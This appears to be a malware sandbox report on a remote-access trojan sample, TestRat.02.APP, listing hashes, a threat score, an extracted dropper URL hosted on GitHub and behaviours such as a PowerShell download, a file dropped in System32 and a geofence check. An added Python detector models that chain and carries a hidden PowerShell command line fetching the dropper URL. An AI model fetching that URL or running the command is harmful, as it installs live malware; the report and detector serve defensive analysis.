General

  • Target

    TestRat.02.APP.zip

  • Size

    91KB

  • Sample

    240722-vh84ssxerc

  • MD5

    4c92ac3b6123d6510273d7894067eefe

  • SHA1

    7723acd7093b7422cb8b074d0091f99afd4f32ed

  • SHA256

    285600cafa0475b557b8f722dcc4628b7e7780a593c69fec0954046a45272ee8

  • SHA512

    65c097000464ea02341a849125a786daf5e1a2ab12464b5a03af9ea23807796cd3c42ca8c862522bc4a8f0b881d54c27af75b30ba21153705feaf65b6bece3c3

  • SSDEEP

    1536:Z8yFhEizoLNrYHPepeOOayzavjOgPRHwwi21HwiuYhF3NKu:ZZFW4zvepek7PRji25w5Yhiu

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Source

  • URLs (exe.dropper)

    https://github.com/Daulaires/Daulaires/releases/download/Lester/Demo.zip

Targets

    • Target

      TestRat.02.APP.dll

    • Size

      23KB

    • MD5

      b59778e44a2f95b038cb3482834dcc5e

    • SHA1

      42a34e81d0759d99277c1d52f79000854361f829

    • SHA256

      e74306f114ac629c7fb15bfcd512829743899f2793be9e48407382df6f29187e

    • SHA512

      fd317aabed56b4e9efdc60ae9f19a505adc3fe394559cc9f7fa7bbae17b0fea28097e5993d9096d64df79fa00bc9adba3d5d798f1c3ef89052bd0ba6c5e46fd6

    • SSDEEP

      384:25HGXComOhEroBdNR17IMTRVag6uhob5Ef87bo50P1IFVpqNb54M3KYJ7Oi+/:QSComOhEWdNAV5d7bJUS73tqD

    Score
    1/10

    • Target

      TestRat.02.APP.exe

    • Size

      139KB

    • MD5

      6d75b31bfa691bdf32c0c9331c8b7ff7

    • SHA1

      5387d89075eb924adca7318add02c0bca8812a9e

    • SHA256

      fb1e3c46ce349e7ae853621f708fe0bfa08e142b6f6262dc9ab6f8e03cb5380f

    • SHA512

      ca08fd9ed2543ff13167f57e27fe4fbb6a395161e25902b7c9ec562034f6cb9aa24f2a32c04341b5ac29c49bd683393856742bd0f400e2c0cc660760ab2b7b83

    • SSDEEP

      3072:CAi4pxpEHmAdx4/kyHRZa0YiRAl278IVn2JbS1cJA8lW7:CAi4pxpRkyHRZa0Gl278IVNc2cW

    Score
    10/10

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      PowerShell Invoke-WebRequest.

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Drops file in System32 directory
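
The signatures above describe one chain: powershell.exe fetches the exe.dropper URL, writes a file under System32, that file runs, and the new process reads the locale configuration from the registry. The following is an added example (not part of the tria.ge report or of the sample) that turns that chain into a single detection over constructed Sysmon-style events. The field names, the dropped-file name, the exact registry key and the ATT&CK technique IDs are my assumptions; the report only lists the behaviours.

```python
"""Chain the signatures listed above into one detection over constructed
process/file/registry telemetry.

Every event in SAMPLE_EVENTS is invented for this example (Sysmon-like field
names). The dropped-file name and registry key are assumptions: the report only
states that a file is dropped in System32 and that a country code is read from
the registry.
"""
import re

# Download primitives commonly abused from powershell.exe.
DOWNLOAD_CMDLET = re.compile(
    r"(?i)\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget|"
    r"DownloadFile|DownloadString|Start-BitsTransfer)\b")
URL_RE = re.compile(r"https?://[^\s\"']+")
SYSTEM32_RE = re.compile(r"(?i)^[a-z]:\\windows\\system32\\")
# Registry paths holding locale/country configuration (assumed geofence targets).
GEO_KEY_RE = re.compile(r"(?i)\\Control Panel\\International\\|\\Control\\Nls\\")

POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROPPED = r"C:\Windows\System32\TestRat.02.APP.exe"  # assumed drop path, not from the report

SAMPLE_EVENTS = [
    {"type": "process", "pid": 100, "ppid": 20, "image": POWERSHELL,
     "cmdline": 'powershell.exe -NoProfile -w hidden -c "iwr '
                'https://github.com/Daulaires/Daulaires/releases/download/Lester/Demo.zip'
                ' -OutFile $env:TEMP\\Demo.zip"'},
    {"type": "network", "pid": 100, "dest_host": "github.com", "dest_port": 443},
    {"type": "file", "pid": 100, "path": DROPPED},
    {"type": "process", "pid": 200, "ppid": 100, "image": DROPPED,
     "cmdline": "TestRat.02.APP.exe"},
    {"type": "registry", "pid": 200, "op": "query",
     "key": r"HKCU\Control Panel\International\Geo\Nation"},
    # Benign noise: a PowerShell session that downloads nothing.
    {"type": "process", "pid": 300, "ppid": 20, "image": POWERSHELL,
     "cmdline": "powershell.exe -c Get-Date"},
]


def detect_dropper_chain(events):
    """Return (attack_technique, description) findings in chain order.

    Each stage is keyed on the previous one (downloader pid -> dropped path ->
    dropped pid), so a lone Invoke-WebRequest or a lone locale lookup does not
    by itself produce the later findings.
    """
    findings = []

    # 1. powershell.exe invoking a download primitive with a URL on its command line.
    downloader_pids = set()
    for e in events:
        if e["type"] != "process" or not e["image"].lower().endswith("powershell.exe"):
            continue
        m = DOWNLOAD_CMDLET.search(e["cmdline"])
        if m:
            urls = URL_RE.findall(e["cmdline"])
            downloader_pids.add(e["pid"])
            findings.append(("T1059.001", f"powershell.exe pid {e['pid']} ran "
                             f"{m.group(1)} against {', '.join(urls) or 'no visible URL'}"))

    # 2. The downloader writing a file under System32.
    dropped_paths = set()
    for e in events:
        if e["type"] == "file" and e["pid"] in downloader_pids and SYSTEM32_RE.match(e["path"]):
            dropped_paths.add(e["path"].lower())
            findings.append(("T1105", f"pid {e['pid']} dropped {e['path']}"))

    # 3. A process whose image is one of those dropped files.
    dropped_pids = set()
    for e in events:
        if e["type"] == "process" and e["image"].lower() in dropped_paths:
            dropped_pids.add(e["pid"])
            findings.append((None, f"dropped file executed as pid {e['pid']}"))

    # 4. The dropped process reading locale/country keys (likely geofence).
    for e in events:
        if e["type"] == "registry" and e["pid"] in dropped_pids and GEO_KEY_RE.search(e["key"]):
            findings.append(("T1614", f"pid {e['pid']} read {e['key']}"))

    return findings


if __name__ == "__main__":
    for technique, text in detect_dropper_chain(SAMPLE_EVENTS):
        print(technique or "-", text)
```

Keying each stage on the previous one is the point: a locale lookup on its own is normal for installers and localised software, and Invoke-WebRequest on its own is everyday administration, but a PowerShell download that lands in System32, executes, and then reads the country setting is the geofenced-dropper pattern the report scores 10/10.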

MITRE ATT&CK Enterprise v15

Tasks